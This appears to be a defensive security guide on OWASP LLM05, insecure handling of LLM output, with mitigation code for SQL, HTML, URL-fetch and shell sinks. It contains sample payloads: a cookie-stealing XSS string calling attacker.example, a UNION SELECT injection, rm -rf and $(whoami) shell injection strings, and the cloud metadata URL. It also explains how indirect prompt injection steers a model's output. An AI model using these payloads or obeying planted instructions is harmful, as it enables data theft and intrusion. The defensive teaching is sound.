Insecure Output Handling in LLMs (OWASP LLM05): Examples and Prevention
Insecure output handling is OWASP LLM05: the failure that happens when downstream code trusts an LLM's output the way it would never trust user input. Worked examples of SQL injection, XSS, SSRF, and command injection via LLM, plus the four-layer prevention stack.
Security engineers spent twenty-five years learning one rule: do not trust input. Then large language models arrived, and teams that would never concatenate a URL parameter into a SQL query started piping raw model output straight into one. That failure has a name in the OWASP Top 10 for LLM Applications: LLM05, Insecure Output Handling. This guide explains exactly what it is, walks through four worked examples of how it gets exploited, and lays out the prevention stack that actually closes it.
If you would rather learn by breaking something, the Insecure Output Handling module runs these attacks against a live target. Read this first for the model; go there to practice.
What insecure output handling is
Insecure output handling is the vulnerability that emerges when a downstream system consumes an LLM's output without treating that output as untrusted. The one-line version: the model is not a trusted component of your stack, even when it feels like one.
The longer version is more useful. An LLM is a text generator with an enormous attack surface upstream of its output. Anything in that upstream surface that an attacker can influence (the system prompt, the user message, retrieved documents, tool responses, the web pages an agent browses) can shape the output into whatever form the attacker wants. The model is, in effect, a configurable way to turn attacker intent into developer-consumed text. If your downstream code trusts that text, the attacker controls your downstream code.
This is distinct from prompt injection, though the two are constantly confused. Prompt injection is about getting the model to produce something it should not. Insecure output handling is about what your code does with whatever the model produced. Prompt injection is the upstream trigger; insecure output handling is the downstream detonation. They compose into the most common high-severity LLM incident pattern, which is covered below.
Why LLM output must be treated as untrusted
Web developers internalized "never trust user input" through a painful decade of SQL injection and reflected XSS. But the lesson was taught narrowly: user input is untrusted. The corollary got less airtime: anything shaped by untrusted input is also untrusted.
LLM output lives exactly inside that corollary. The user's chat message is obviously untrusted. The model's response, which was shaped by that message and by every retrieved document and tool output in the context window, is equally untrusted. But it feels different. It arrives from an API your team pays for, wrapped in an SDK your team imports, produced by an engine you mentally filed under "backend." The surface cue that normally fires the untrusted reflex (an input box, a URL parameter, a form field) is missing. So the reflex does not fire, and the output flows downstream like any internal value.
State the correct model plainly: if the LLM's context window contains any attacker-influenceable text, every byte of the LLM's output is attacker-influenceable text. That condition holds for essentially every production LLM application. Which means the output is untrusted in essentially every production LLM application.
Insecure output handling examples
The vulnerabilities that emerge are not new. They are the classic web-security top ten, reintroduced through a new entry vector. Here are the four that show up most often, with the mechanism for each.
SQL injection via LLM
An agent is asked to turn a natural-language request into a database query. It does. The query executes. But attacker-controlled content upstream, say an indirect-injection payload buried in a document the agent was told to analyze, steered the generated SQL to include a UNION SELECT against a table the agent should never touch. The query ran under the agent's service credentials, which have broad read access because convenient tooling tends to accumulate broad permissions. Data no user was authorized to see is now in the model's next response.
The root cause is not that the model "decided" to attack the database. It is that an engineer wrote the equivalent of cursor.execute(llm_response) without applying the parameterization discipline they would apply to any other untrusted SQL source.
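A minimal sketch of the alternative, assuming the model is asked for a structured filter instead of raw SQL. The `orders` and `secrets` tables, the `ALLOWED_COLUMNS` allowlist, and the `run_llm_filter` helper are all hypothetical names invented for illustration; only the `sqlite3` calls are real.

```python
import sqlite3

# Hypothetical allowlist: the only columns the model may filter on.
ALLOWED_COLUMNS = {"status", "customer_id"}

def run_llm_filter(conn, llm_filter):
    """Run a SELECT built from a model-proposed filter, never from model-written SQL.

    llm_filter is assumed to look like {"column": "status", "value": "shipped"}.
    """
    column = llm_filter.get("column")
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"column not allowed: {column!r}")
    # The identifier comes from our allowlist; the value is bound as a
    # parameter, so the database never parses it as SQL.
    query = f"SELECT id, status FROM orders WHERE {column} = ?"
    return conn.execute(query, (llm_filter.get("value"),)).fetchall()

# Throwaway in-memory database for the demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, status TEXT, customer_id TEXT)")
conn.execute("INSERT INTO orders VALUES (1, 'shipped', 'c1'), (2, 'pending', 'c2')")
conn.execute("CREATE TABLE secrets (id INTEGER, token TEXT)")
conn.execute("INSERT INTO secrets VALUES (1, 'hunter2')")

# A benign filter returns the matching row.
rows = run_llm_filter(conn, {"column": "status", "value": "shipped"})

# An attacker-steered value is compared as a literal string and matches nothing.
injected = run_llm_filter(
    conn,
    {"column": "status", "value": "x' UNION SELECT id, token FROM secrets --"},
)
```

The design choice is that the model never authors SQL text at all: it picks from an allowlist and supplies values, and the query shape stays under the engineer's control. Scoping the agent's database credentials to the tables it actually needs is a separate control that this sketch does not show.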
XSS via LLM
The chat UI renders the model's response as markdown or HTML. An attacker steers the output to contain a <script> tag, an <img onerror=...> handler, or the markdown-image equivalent pointing at an attacker-controlled URL. The victim opens the chat, the payload executes inside their authenticated session, and session tokens, CSRF tokens, and page PII are exfiltrated before the tab closes. This is stored XSS with the model as the storage and delivery mechanism.
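For the simplest case, where the response can be shown as plain text, escaping at render time is enough. The sketch below assumes the output lands in HTML element content; `render_chat_message` and the `message` class name are hypothetical.

```python
import html

def render_chat_message(model_output: str) -> str:
    """Return an HTML fragment that displays model output as inert text."""
    # html.escape rewrites &, < and >, plus both quote characters when
    # quote=True, so the browser shows the markup instead of running it.
    return f'<div class="message">{html.escape(model_output, quote=True)}</div>'

# An attacker-steered response carrying an event-handler payload.
payload = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
fragment = render_chat_message(payload)
```

This covers only the element-content context. Output placed inside an attribute, a script block, or a URL needs the encoding for that context, and a UI that must render rich markdown needs a hardened sanitizer instead of blanket escaping.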
SSRF and data exfiltration via LLM
An agent can fetch URLs, or its UI auto-loads images from the markdown it renders. The attacker gets the model to emit a URL pointing at an internal service (http://169.254.169.254/... for cloud metadata, or an internal admin endpoint) or at an attacker server with stolen data in the query string. The fetch happens from inside your trust boundary. The markdown-image variant is the quietest and most common exfiltration channel in LLM apps; it has its own walkthrough in the markdown image exfiltration guide.
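A rough sketch of the check that belongs in front of any fetch or image load. The scheme and host allowlists are placeholder values, and `is_fetch_allowed` is a hypothetical helper, not part of any library.

```python
from urllib.parse import urlsplit

# Hypothetical allowlists; a real deployment would list its own hosts.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

def is_fetch_allowed(url: str) -> bool:
    """Return True only for URLs whose scheme and exact host are allowlisted."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lowercased, with userinfo and port removed
    except ValueError:
        # Malformed URLs (for example a broken IPv6 literal) are refused.
        return False
    if parts.scheme not in ALLOWED_SCHEMES or host is None:
        return False
    # Exact match: no suffix or substring matching, so IP literals and
    # lookalike hosts such as docs.example.com.attacker.example fail.
    return host in ALLOWED_HOSTS
```

An exact-match allowlist is deliberately blunt. It refuses the cloud metadata address, attacker-owned hosts, and the `user@host` trick in one comparison. It does not handle redirects: the fetching client still has to disable them or re-run the check on every hop.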
Command injection via LLM
An agent with a code-execution or shell tool generates a command from a template that includes model output. Attacker-influenced output injects command-substitution syntax or a chained ; rm -rf style payload. The command runs with the agent's privileges. This is the same failure as SQL injection, one consumption surface over, and it is increasingly common as agents gain "run this" capabilities. The tool abuse guide covers the tool-boundary version in depth.
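Where an agent genuinely needs to run something, one hedged pattern is a fixed allowlist of tools invoked without a shell. `ALLOWED_TOOLS` and `run_tool` are hypothetical, and the single "echo" tool is a stand-in implemented with the Python interpreter so the sketch runs anywhere.

```python
import subprocess
import sys

# Hypothetical allowlist: tool name -> fixed argv prefix chosen by the developer.
ALLOWED_TOOLS = {
    "echo": [sys.executable, "-c", "import sys; print(sys.argv[1])"],
}

def run_tool(tool: str, argument: str) -> str:
    """Run an allowlisted tool with model output as one literal argument."""
    if tool not in ALLOWED_TOOLS:
        raise PermissionError(f"tool not allowed: {tool!r}")
    # A list argv with the default shell=False means no shell ever parses
    # the argument, so ';' and '$(...)' are plain characters.
    argv = ALLOWED_TOOLS[tool] + [argument]
    result = subprocess.run(
        argv, capture_output=True, text=True, timeout=10, check=True
    )
    return result.stdout

# The injection syntax comes back verbatim instead of being executed.
output = run_tool("echo", "hello; echo INJECTED $(whoami)")
```

Avoiding the shell removes command chaining and substitution, but not argument injection: a real tool may still treat a value beginning with `-` as an option, so each tool needs its own argument validation as well.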
How it composes with prompt injection
Neither attack class is maximally dangerous alone. Together they are the canonical high-severity LLM incident:
- Indirect prompt injection plants the instruction. An attacker hides text in a document, web page, or email the agent will process.
- The model follows it and produces attacker-chosen output (a malicious SQL fragment, an exfiltration URL, a script tag).
- Insecure output handling detonates it. Downstream code consumes that output without sanitization, and the attack lands.
This is why fixing only one half leaves you exposed. You cannot reliably stop the model from emitting bad output (prompt injection has no complete fix), so you must treat the output as untrusted at every consumption site. Output handling is the layer you actually control. See the indirect prompt injection guide for the upstream half and the OWASP LLM Top 10 annotated for how these categories interlock.
How to prevent insecure output handling
There is no single switch. The defense is a four-layer stack, applied at the boundaries where output is produced and consumed.
- Structured output at the model boundary. Where the use case allows, force the model into a constrained schema (JSON schema, function-calling, tool-use) instead of free text. This shrinks the attack surface from "arbitrary string" to "values inside a typed shape." It does not close the class by itself, because the values inside the structure are still attacker-influenceable, but it removes whole categories of payload.
- Schema validation after generation. Validate the structured output against a strict schema before anything consumes it. Reject anything that does not conform. Treat a validation failure as a security event, not a retry-quietly event.
- Context-appropriate escaping at the consumption site. This is the load-bearing layer. Parameterize SQL. Escape HTML for the exact rendering context. Allowlist URL schemes and hosts before any fetch or image load. Never pass model output to a shell. The rule is identical to classic injection defense: escape for the destination, at the destination, every time.
- Sanitization of any free-text surface rendered to a user. If model output is shown as markdown or HTML, run it through a hardened sanitizer that strips scripts, event handlers, and external resource loads (including markdown images pointing off-domain) unless you have an explicit reason to allow them.
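The first two layers can be sketched with the standard library alone. The schema here (an `action` from a fixed set plus a positive integer `order_id`) is invented for illustration, as are `parse_model_output` and `OutputValidationError`. A production system would more likely use a schema library, which this sketch does not assume.

```python
import json

# Hypothetical schema: exactly these keys, with these constraints.
ALLOWED_ACTIONS = {"lookup_order", "summarize"}
EXPECTED_KEYS = {"action", "order_id"}

class OutputValidationError(Exception):
    """Raised when model output does not match the expected shape."""

def parse_model_output(raw: str) -> dict:
    """Parse and strictly validate model output before anything consumes it."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise OutputValidationError("not valid JSON") from exc
    # Reject extra or missing keys instead of silently ignoring them.
    if not isinstance(data, dict) or set(data) != EXPECTED_KEYS:
        raise OutputValidationError("unexpected keys or top-level type")
    action = data["action"]
    if not isinstance(action, str) or action not in ALLOWED_ACTIONS:
        raise OutputValidationError("action not allowed")
    order_id = data["order_id"]
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(order_id, bool) or not isinstance(order_id, int) or order_id <= 0:
        raise OutputValidationError("order_id must be a positive integer")
    return data

valid = parse_model_output('{"action": "lookup_order", "order_id": 42}')
```

The caller is expected to log an `OutputValidationError` as a security event, in line with the second layer. Validation narrows the values; it does not replace escaping at the consumption site, because a well-typed string can still carry a payload.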
The mental shortcut that prevents most of these bugs: wherever you consume LLM output, ask what you would do if that exact value came from a hostile user typing into a form. Do that. If the answer is "parameterize it," parameterize the LLM output too. If the answer is "I would never run this as a shell command," do not run the LLM's version either.
Frequently asked questions
Is insecure output handling the same as prompt injection? No. Prompt injection makes the model produce bad output. Insecure output handling is your code trusting that output. They chain, but they are fixed at different layers, and the output-handling layer is the one you fully control.
Does structured output (JSON / function calling) fix it? It helps a lot and closes some categories, but the values inside the structure are still attacker-influenceable. You still need validation and context-appropriate escaping at the consumption site.
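What OWASP category is this? LLM05 in the OWASP Top 10 for LLM Applications. The 2025 edition titles the category Improper Output Handling; the 2023 edition listed it as LLM02, Insecure Output Handling. The full annotated list is in the OWASP LLM Top 10 guide.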
How do I test my own app for it? Enumerate every place LLM output is consumed by code (not just shown to a user): database queries, shell commands, HTTP fetches, HTML renders, file writes. For each, send an output-shaped payload containing that surface's injection primitive and confirm the system sanitizes or refuses. The hands-on module walks this end to end.
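One way to start that enumeration is a small harness that feeds each consumption site a payload as if it were model output. Everything here is hypothetical scaffolding: `PAYLOADS`, `audit_sink`, and the two toy render functions stand in for your own sinks, and treating any raised exception as a refusal is an assumption you may want to tighten.

```python
import html

# Illustrative injection primitives, one per consumption surface.
PAYLOADS = {
    "html": "<script>alert(1)</script>",
    "sql": "x' OR '1'='1",
    "shell": "; rm -rf /tmp/x",
    "url": "http://169.254.169.254/latest/meta-data/",
}

def audit_sink(sink, payload, is_neutralized):
    """Return True if the sink refuses the payload or neutralizes it."""
    try:
        result = sink(payload)
    except Exception:
        # Assumption: any raised error counts as the sink refusing the input.
        return True
    return bool(is_neutralized(result))

# Two toy HTML sinks: one vulnerable, one escaping.
def raw_render(text):
    return f"<p>{text}</p>"

def escaped_render(text):
    return f"<p>{html.escape(text)}</p>"

def no_script_tag(rendered):
    return "<script" not in rendered.lower()

raw_ok = audit_sink(raw_render, PAYLOADS["html"], no_script_tag)
escaped_ok = audit_sink(escaped_render, PAYLOADS["html"], no_script_tag)
```

Here `raw_ok` comes back false and `escaped_ok` true. A substring check like `no_script_tag` is a smoke test, not proof of safety; each surface deserves a check that reflects how that destination actually parses its input.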
Ready to exploit it yourself? The Insecure Output Handling module runs these attacks against a live agent, and the Wraith Academy drills every OWASP LLM attack class free.